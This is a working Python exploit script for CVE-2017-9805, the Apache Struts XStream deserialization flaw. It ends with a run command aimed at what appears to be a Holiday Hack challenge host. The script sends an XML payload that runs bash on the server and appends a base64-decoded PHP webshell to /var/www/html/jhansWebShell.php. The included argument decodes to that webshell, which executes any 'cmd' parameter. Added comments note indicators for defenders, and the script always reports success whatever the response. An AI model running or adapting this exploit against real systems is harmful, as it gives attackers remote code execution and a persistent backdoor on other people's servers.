  1. # Vendor Homepage: https://struts.apache.org/
  2. # Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
  3. # Tested Against: Ubuntu 16.04
  4. # CVE: 2017-9805
  5. # License: MIT License
  6. import requests
  7. import argparse
  8. import base64
  9. import sys
  10. import random
  11. import re
  12. from xml.dom import minidom
  13. from xml.dom.minidom import parse, parseString
  14.  
  15. #Helper producing a random string of `num` characters drawn from the literal alphabet below (upper/lower letters plus the digits, which are listed three times and so are weighted more heavily). Uses `random`, not `secrets`. Not referenced anywhere else in this file.
  16. random_string = lambda num: ''.join(random.choice("QWERTYUIOPASDFGHJKLXZCVBNMqwertyuiopasdfghjklzxcvbnm123456789012345678901234567890") for _ in range(num))
  17.  
  18. #iterates over the elements in the template XML object and replaces with desired commands
  19. def get_item_list(itemlist, encoded_command, the_match):
#Walk the child nodes of every element in `itemlist`; any node whose nodeValue is exactly `the_match` has its nodeValue overwritten in place with `encoded_command`.
#Mutates the DOM it is handed and returns None. Only an exact, case-sensitive match is replaced, so a placeholder that differs by even one character is left untouched.
  20. for item in itemlist:
  21. for item2 in item.childNodes:
  22. if item2.nodeValue == the_match:
  23. item2.nodeValue = encoded_command
  24.  
  25. #Main function
  26. def main(url, command):
#Build the request for the CVE named in the file header and POST it to `url`. Despite the comments and status messages below, `command` is NOT base64-encoded here:
#the shell pipeline assembled under "encoded_command" runs `base64 -d` on it, so the caller must already pass base64 text (the `base64` import at the top of the file is unused).
#Returns None. The HTTP response is never inspected.
  27. #XML can be pretty finicky with special characters and escaping. Combine this with command execution with struts and it's even more finicky.
  28. print('[+] Encoding Command')
  29. #Nothing is actually encoded at this point: the user-supplied (already base64) text is wrapped in a shell pipeline that uses only XML-friendly characters.
  30. #That pipeline decodes it and appends the result to a PHP file under the web root -- a persistent webshell drop, not a temporary file that is executed and removed. Defender IoC: /var/www/html/jhansWebShell.php.
  31. encoded_command = 'echo '+command+' | base64 -d | tee -a /var/www/html/jhansWebShell.php'
  32. print('[+] Building XML object')
  33. #Build the initial XML template: a Java deserialization payload whose ProcessBuilder element runs /bin/bash -c on the COMMANDWILLGOHERE placeholder text.
  34. xml_exploit = parseString('<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/><next class="java.lang.ProcessBuilder"><command><string>/bin/bash</string><string>-c</string><string>COMMANDWILLGOHERE</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class="string">foo</next></serviceIterator><lock/></cipher><input class="java.lang.ProcessBuilder$NullInputStream"/><ibuffer/><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>')
  35. #Request headers. Content-Type application/xml is what makes the server parse the body as XML; the User-Agent is a fixed browser string. Both are constant, so they are usable as detection features alongside the class names in the body.
  36. header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','Content-Type': 'application/xml'}
  37. #Collect every <string> element; the placeholder is the text of one of them.
  38. itemlist = xml_exploit.getElementsByTagName('string')
  39. #Swap the placeholder text node for the shell pipeline, in place (see get_item_list).
  40. print('[+] Placing command in XML object')
  41. get_item_list(itemlist, encoded_command, "COMMANDWILLGOHERE")
  42. print('[+] Converting Back to String')
  43. #Serialize the DOM back to bytes (utf8 encoding).
  44. exploit = xml_exploit.toxml('utf8')
  45. print('[+] Making Post Request with our payload')
  46. #POST the XML body to the target. The response object (`request`) is never examined.
  47. request = requests.post(url, data=exploit, headers=header)
  48. print('[+] Payload executed')
#Printed unconditionally: a non-2xx, blocked, or errored response still reports success.
  49.  
  50. if __name__ == "__main__":
  51. #Checking for proper arguments of url and desired command to execute
  52. parser = argparse.ArgumentParser()
  53. parser.add_argument('-u', type=str, help='url of target vulnerable apache struts server. Ex- http://somevulnstrutsserver.com/orders.xhtml', dest='url')
  #`-u` is not marked required, so args.url can be None; only the argv-length check below partially stands in for that.
  54. parser.add_argument('-c', type=str, help='command to execute against the target. Ex - /usr/bin/whoami', dest='command', required=True)
  55. parser.add_help
  #The line above is a bare attribute access with no effect; ArgumentParser already enables -h/--help by default.
  56. #validate all the arguments were passed (counts argv entries only, not which options were given)
  57. if len(sys.argv) < 3:
  58. parser.print_help()
  59. sys.exit(1)
  60. args = parser.parse_args()
  61. #Check that the url looks like an http(s) URL. If `-u` was omitted, args.url is None and .strip() raises AttributeError here instead of printing help.
  62. if not bool(re.search(r'^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$',args.url.strip(), re.IGNORECASE)):
  63. print('\n---- Invalid Url ----\n')
  64. parser.print_help()
  65. sys.exit(1)
  66. #just make sure there is some length to the command (the regex accepts any non-empty line; the -c help text says a plain command, but main() expects base64 text)
  67. elif not bool(re.search(r'^.+$',args.command.strip(), re.IGNORECASE)):
  68. print('\n---- Invalid Command ----\n')
  69. parser.print_help()
  70. sys.exit(1)
  71. main(args.url, args.command)
  72.  
  73. COMMAND
  74. python exploitPython.py -u http://dev.northpolechristmastown.com/orders.xhtml -c PGh0bWw+DQo8Ym9keT4NCjxmb3JtIG1ldGhvZD0iR0VUIiBuYW1lPSI8P3BocCBlY2hvIGJhc2VuYW1lKCRfU0VSVkVSWydQSFBfU0VMRiddKTsgPz4iPg0KPGlucHV0IHR5cGU9IlRFWFQiIG5hbWU9ImNtZCIgaWQ9ImNtZCIgc2l6ZT0iODAiPg0KPGlucHV0IHR5cGU9IlNVQk1JVCIgdmFsdWU9IkV4ZWN1dGUiPg0KPC9mb3JtPg0KPHByZT4NCjw/cGhwDQogICAgaWYoJF9HRVRbJ2NtZCddKQ0KICAgIHsNCiAgICAgICAgc3lzdGVtKCRfR0VUWydjbWQnXSk7DQogICAgfQ0KPz4NCjwvcHJlPg0KPC9ib2R5Pg0KPHNjcmlwdD5kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY21kIikuZm9jdXMoKTs8L3NjcmlwdD4NCjwvaHRtbD4=